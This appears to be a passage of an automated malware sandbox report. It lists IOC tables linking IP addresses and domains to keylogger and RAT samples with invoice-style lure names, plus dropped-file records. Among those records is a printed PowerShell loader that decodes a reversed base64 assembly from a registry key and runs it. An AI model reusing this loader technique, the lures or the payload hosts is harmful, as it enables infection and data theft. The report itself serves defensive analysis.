12:43:12 | Task Scheduler  | Run new task: pcPseOUmXnpEaeF path: C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
144.91.79.54 | BankInformation.vbe | malicious | AgentTesla | 144.91.79.54/1211/file
144.91.79.54 | Ref#2073306.vbe | malicious | MicroClip | 144.91.79.54/0911/file
144.91.79.54 | SWIFTCOPY202973783.vbe | malicious | AgentTesla | 144.91.79.54/0911/file
144.91.79.54 | Ref#130709.vbe | malicious | MassLogger RAT | 144.91.79.54/0911/file
144.91.79.54 | MV EAGLE EYE RFQ-92008882920-PDF.vbs | malicious | Unknown | 144.91.79.54/2210/file
144.91.79.54 | Urgent Quotation documents One Pdf.vbs | malicious | AgentTesla | 144.91.79.54/2210/file
144.91.79.54 | Chronopost_FormulaireAdresse.vbs | malicious | AsyncRAT | 144.91.79.54/2210/file
144.91.79.54 | Ref#150689.vbe | malicious | AgentTesla | 144.91.79.54/1210/file
144.91.79.54 | INQ887721122.vbs | malicious | Unknown | 144.91.79.54/1210/file
144.91.79.54 | INQ-PORT_9290029992-pdf.vbs | malicious | Snake Keylogger, VIP Keylogger | 144.91.79.54/1210/file
193.122.6.168 | DHL Packing list.bat.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | Enclosed Offer.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.6.168 | RE Invoice Request (Nov 2024).exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.6.168 | Solicitud de cotizacion Stro1268975.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe | malicious | VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | rFACTURASALBARANESPENDIENTES.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | rCEMG242598.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | EKSTRE_1022.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | DHL Packing list.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | Enclosed Offer.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
reallyfreegeoip.org | Pedido_335_20241112_614171.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | PO-000041522.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | RE Invoice Request (Nov 2024).exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
reallyfreegeoip.org | Solicitud de cotizacion Stro1268975.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | JOSHHHHHH.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe | malicious | VIP Keylogger | 188.114.96.3
checkip.dyndns.com | DHL Packing list.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | Enclosed Offer.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
checkip.dyndns.com | Pedido_335_20241112_614171.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | PO-000041522.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | RE Invoice Request (Nov 2024).exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
checkip.dyndns.com | Solicitud de cotizacion Stro1268975.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | JOSHHHHHH.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
checkip.dyndns.com | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe | malicious | VIP Keylogger | 193.122.6.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | DHL Packing list.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | Enclosed Offer.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
ORACLE-BMC-31898US | PO-000041522.exe | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | RE Invoice Request (Nov 2024).exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
ORACLE-BMC-31898US | Solicitud de cotizacion Stro1268975.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe | malicious | VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | Revised invoice.exe | malicious | MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | rFACTURASALBARANESPENDIENTES.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exe | malicious | VIP Keylogger | 193.122.130.0
CLOUDFLARENETUS | NfFibKKmiz.exe | malicious | Unknown | 104.16.123.96
CLOUDFLARENETUS | 63w24wNW0d.exe | malicious | Unknown | 104.16.124.96
CLOUDFLARENETUS | ajbKFgQ0Fl.exe | malicious | Unknown | 172.67.69.226
CLOUDFLARENETUS | KKXT7bY8bG.exe | malicious | Unknown | 172.67.69.226
CLOUDFLARENETUS | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 188.114.96.3
CLOUDFLARENETUS | DHL Packing list.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
CLOUDFLARENETUS | #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | Enclosed Offer.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
CLOUDFLARENETUS | [Inquiry] mv Palmela - CE replacement at your port, oa Nov. 22nd.scr.exe | malicious | AgentTesla | 172.67.74.152
CONTABODE | Quotation request -30112024_pdf.exe | malicious | FormBook | 161.97.142.144
CONTABODE | 4c9ebxnhQk.exe | malicious | Unknown | 80.241.214.102
CONTABODE | BankInformation.vbe | malicious | AgentTesla | 144.91.79.54
CONTABODE | BlgAsBdkiD.exe | malicious | FormBook | 161.97.142.144
CONTABODE | DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe | malicious | FormBook | 161.97.142.144
CONTABODE | PO-DC13112024_pdf.vbs | malicious | Unknown | 161.97.142.144
CONTABODE | https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.ca | malicious | Captcha Phish | 207.180.225.113
CONTABODE | Ref#2073306.vbe | malicious | MicroClip | 144.91.79.54
CONTABODE | Arrival Notice.exe | malicious | FormBook | 161.97.142.144
CONTABODE | 75A0VTo3z9.exe | malicious | Emotet | 5.189.178.202
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | DHL Packing list.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Enclosed Offer.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Pedido_335_20241112_614171.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | PO-000041522.exe | malicious | Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | RE Invoice Request (Nov 2024).exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Solicitud de cotizacion Stro1268975.exe | malicious | Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | JOSHHHHHH.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe | malicious | VIP Keylogger | 188.114.96.3
No context

Process: C:\Windows\System32\wermgr.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.5202496951648052
Encrypted: false
SSDEEP: 96:CsaR0Fqvj+rxYid2RH3Uje0e3e/3hosM1QXIGZAX/d5FMT2SlPkpXmTAUf/VXT5t:DML+mG2R30hHxAzuiFCZ24lO8
MD5: C99B5C89597DC427F9665A6F143C68C3
SHA1: 34D7728102A981A39E41747CE625B240C4A8EAE7
SHA-256: 176AD9712BF9E8764F233CE04CD329DCCF103A8FD004B26245DC0DBB703323C2
SHA-512: B15838825ED4AFC1D70C3A210F1B1D4EAFAB9CACD3ED800206FAA347C8635506842348B2321C954D2F6D2638B00E59E06209F8910055B9DA76723E1B5E5F1C3F
Malicious: false
Preview:
Version=1
EventType=PowerShell
EventTime=133764077415047254
ReportType=1
Consent=1
UploadTime=133764074629673076
ReportStatus=524384
ReportIdentifier=f91469e8-94e8-4534-aa9f-4b2950b35f10
Wow64Host=34404
OriginalFilename=PowerShell.EXE
AppSessionGuid=00001b98-0001-0014-7070-ef8bb739db01
TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000f43d9bb316e30ae1a3494ac5b0624f6bea1bf054!powershell.exe
TargetAppVer=2037//06//10:07:45:25!7d6da!powershell.exe
BootId=4294967295
Targe

Process: C:\Windows\System32\wermgr.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.5338818710068783
Encrypted: false
SSDEEP: 96:CXa3uFj2jLxrxYidNRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAtf/VXTT:GZgLxmGNR30wAAzuiFdZ24lO8
MD5: FE1DA4CA9E448B98B8A44D7AD49AE857
SHA1: B2FB0D4A51809F51799E0EA60A501F6CA975F13A
SHA-256: C1B9163C845E7CFC4BC10A512D37E1915DC2FBD071F6A11C382EA28A3296805F
SHA-512: 6590D297351AA23FD866990B80A81C8D1B6DB17289622D50ED3E4D6BC2285C003F21D9B0C3FC6FC205B6FDADD306234E25B1FAD03E692E9D1805DA7FB392066B
Malicious: false
Preview:
Version=1
EventType=PowerShell
EventTime=133764076523036614
ReportType=1
Consent=1
UploadTime=133764074628251073
ReportStatus=524384
ReportIdentifier=ec54bff5-5d0d-4d3f-9a14-b2f6c141453d
Wow64Host=34404
OriginalFilename=PowerShell.EXE
AppSessionGuid=00000760-0001-0014-87a4-2e95b739db01
TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000f43d9bb316e30ae1a3494ac5b0624f6bea1bf054!powershell.exe
TargetAppVer=2037//06//10:07:45:25!7d6da!powershell.exe
BootId=4294967295
Targe

Process: C:\Windows\System32\wermgr.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 7416
Entropy (8bit): 3.683671562243095
Encrypted: false
SSDEEP: 96:RSIU6o7wVetb/RWw95l6YkWogmfHNV9reCQu5aMd20m:R6l7wVeJpWw95l6YkWogmftq4pd20m
MD5: F9E6A143650053026027BD4F62741DDE
SHA1: F98BF4B673A432B03D1A14E21D3AD9DDF377824F
SHA-256: 7A600137F931CA0CD43DA0597A6DD6A10A46DB08E9A7998E711FAB5372956702
SHA-512: CC51D35918C3F96DF9E80234A1B7119A7A3FA5E58E1866A992CE0326A720A8BB7998997A091873B7ACAAB0F6D904ABCB828F32591F31092CEB106EEE4BAFD8FD
Malicious: false
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>1888</Pi

Process: C:\Windows\System32\wermgr.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 7230
Entropy (8bit): 3.683485161152533
Encrypted: false
SSDEEP: 96:RSIU6o7wVetbFxJLHVhV6Yk/ogmfHNp02cCQu5aMgZ0m:R6l7wVeJFxJL1hV6Yk/ogmftvc4pgZ0m
MD5: 41A3ACEFFBCE8D4B0F6D33E0798A07C6
SHA1: 087F9C761FFFBADB8501786D6EE3CDD645EB03BB
SHA-256: 0F53E40EE97DFB70A7FD0652EF5695E3978D6703B1DEA63BAB80AD16AB5CE8CA
SHA-512: B06827B0B9BACF16256235A10A0193011547C1B1330BB71306ABEBD28C2AFFA5C4D84D51120C551DE75581D9D21AB5B19343A1C3C725F256A12A7F82E35E9DFA
Malicious: false
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>7064</Pi

Process: C:\Windows\System32\wermgr.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4899
Entropy (8bit): 4.568412030112732
Encrypted: false
SSDEEP: 48:cvIwWl8zsBJg771I9EnWpW8VYFrYm8M4JFKlnOtSFrRyq8vT0Otuytfsd:uIjfTI7/W7VlJFKlntRWT0Tufsd
MD5: F737F76546C720CF30AE69CC96D97FEC
SHA1: 21DBB327C8E62900360CB24BF71D5F8BE022C908
SHA-256: FAA34B66138A29DE3E5E97D585C0ABA571201041185C3992CA566B7BCB327D11
SHA-512: 73BB7D5D524A2C6D80A905F9054B0FEDA3CA2AF2E03C7DAE562DE08D2E1FC4D033FA656A01D1F6F778579D1044B0CBB22E80411FBBF973A012B94F204DEE06E0
Malicious: false
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
  <tlm>
    <src>
      <desc>
        <mach>
          <os>
            <arg nm="vermaj" val="10" />
            <arg nm="vermin" val="0" />
            <arg nm="verbld" val="19045" />
            <arg nm="vercsdbld" val="2006" />
            <arg nm="verqfe" val="2006" />
            <arg nm="csdbld" val="2006" />
            <arg nm="versp" val="0" />
            <arg nm="arch" val="9" />
            <arg nm="lcid" val="2057" />
            <arg nm="geoid" val="223" />
            <arg nm="sku" val="48" />
            <arg nm="domain" val="0" />
            <arg nm="prodsuite" val="256" />
            <arg nm="ntprodtype" val="1" />
            <arg nm="platid" val="2" />
            <arg nm="tmsi" val="593507" />
            <arg nm="osinsty" val="1" />
            <arg nm="iever" val="11.789.19041.0-11.0.1000" />
            <arg nm="portos" val="0" />
            <arg nm="ram" val="409

Process: C:\Windows\System32\wermgr.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4711
                                                            Entropy (8bit):4.509218256506956
                                                            Encrypted:false
                                                            SSDEEP:96:uIjfTI7/W7VKJFKl0F3DF2WTnF3DFdufhHd:uIfY/W704E7V7ufh9
                                                            MD5:1D06A8A69BD3B7D44376C09EC6AD9678
                                                            SHA1:C28364B7F2B995ADCB57879D8FFF41D649386F12
                                                            SHA-256:C6E46AE3851B6769890C1B38C59246BAE6DE578C61FC73F4D4D75BB440D0F6F2
                                                            SHA-512:1E8A9D1AEC3B680BB94EF6A44FE5DA3E0A439B1B895459353DF4A4637DC7CACFC64B6A477F6539EDA7926558EBAEE43AC4BC65B00A1ED2570F8DB075D4292630
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="593507" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):11887
                                                            Entropy (8bit):4.901437212034066
                                                            Encrypted:false
                                                            SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                                            MD5:ED30A738A05A68D6AB27771BD846A7AA
                                                            SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                                            SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                                            SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                                            Malicious:false
                                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):3256
                                                            Entropy (8bit):5.404109340363203
                                                            Encrypted:false
                                                            SSDEEP:48:gEzsSU4xymdajm9qr9tz4RIoUQ/78Nf+oH0GxJZKaVEouYAgwd64rHLjtvwpPEhI:gEzlHxvJ9qrfIfl7Kf+olJ5Eo9Adrxwt
                                                            MD5:95772EFB0D98B0FDC1F3CD71213F4A49
                                                            SHA1:666A684CC4706D2013AECA319681E7ECD12BEAA3
                                                            SHA-256:3F74ACF9513B51D78314654F92B4105EF35E55F38748B4A24E32D023B61A859C
                                                            SHA-512:BFD108B69A240F3E678099A5E6DC361F6C674FBC96D13A905264A0A3F5925C50AE83407F9A2FAAD1EE8CE9BAB4F185FEAAE1AAB7700555B23371FD72FB05BD00
                                                            Malicious:false
                                                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):252
                                                            Entropy (8bit):5.355593960973263
                                                            Encrypted:false
                                                            SSDEEP:6:xVwe5ljxsu2xKbLtSXqo830Gxsj+EoXZuBiA2V0LYQ13jH2eFI59:772EtSXqdpc8Jci1V0LYQFH2eo
                                                            MD5:112890B95BB4E5F2A80B0C23882338D0
                                                            SHA1:3D91833CAEFE4A51AD343E728EB46D577430168D
                                                            SHA-256:76CBE043628A97A4BA714BB7B68B2D5CCE327256A0F47E3D47ECE05EE4A7F2F1
                                                            SHA-512:CE76161C6B8DB4BFFC6CD87279AADF091ED5CC67CDF6F69A85D68AC4FC2047C72C8AD93833E48AC819C0DCCB2554F4892D8C3B43E313E2D8286BE3CE0DF489E1
                                                            Malicious:false
                                                            Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\pcPseOUmXnpEaeF' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('pcPseOUmXnpEaeF')..Stop-Process -Name conhost -Force..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6221
                                                            Entropy (8bit):3.710479057510546
                                                            Encrypted:false
                                                            SSDEEP:96:mjLlyt33CxH9hkvhkvCCtweI78H3eI7HHb:mjZcyd9weVeA
                                                            MD5:792AC76E1C8402DC4F63248BD1CA20A2
                                                            SHA1:3570CA2FB92312B16BD399F5C4B85397BBAD46F1
                                                            SHA-256:CD551C1CAAD95CBBE6D68E19AEFD77D5C2E4A84A53AFC71DA55EC123300E7A16
                                                            SHA-512:7BBAFF9323432051FECC4FD5745F5F0B235F55698E1E1F48D03B2BA656211B0B7FE96346E5D58831131438F52BB31077C8A078CEA737F06CA006250F8DAB1DA8
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...-/.v......5..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....A la.9.......9......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^rY\e...........................%..A.p.p.D.a.t.a...B.V.1.....rYhe..Roaming.@......CW.^rYhe..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^rY`e..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................A.-.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^rY.e....Q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6221
                                                            Entropy (8bit):3.710479057510546
                                                            Encrypted:false
                                                            SSDEEP:96:mjLlyt33CxH9hkvhkvCCtweI78H3eI7HHb:mjZcyd9weVeA
                                                            MD5:792AC76E1C8402DC4F63248BD1CA20A2
                                                            SHA1:3570CA2FB92312B16BD399F5C4B85397BBAD46F1
                                                            SHA-256:CD551C1CAAD95CBBE6D68E19AEFD77D5C2E4A84A53AFC71DA55EC123300E7A16
                                                            SHA-512:7BBAFF9323432051FECC4FD5745F5F0B235F55698E1E1F48D03B2BA656211B0B7FE96346E5D58831131438F52BB31077C8A078CEA737F06CA006250F8DAB1DA8
                                                            Malicious:false
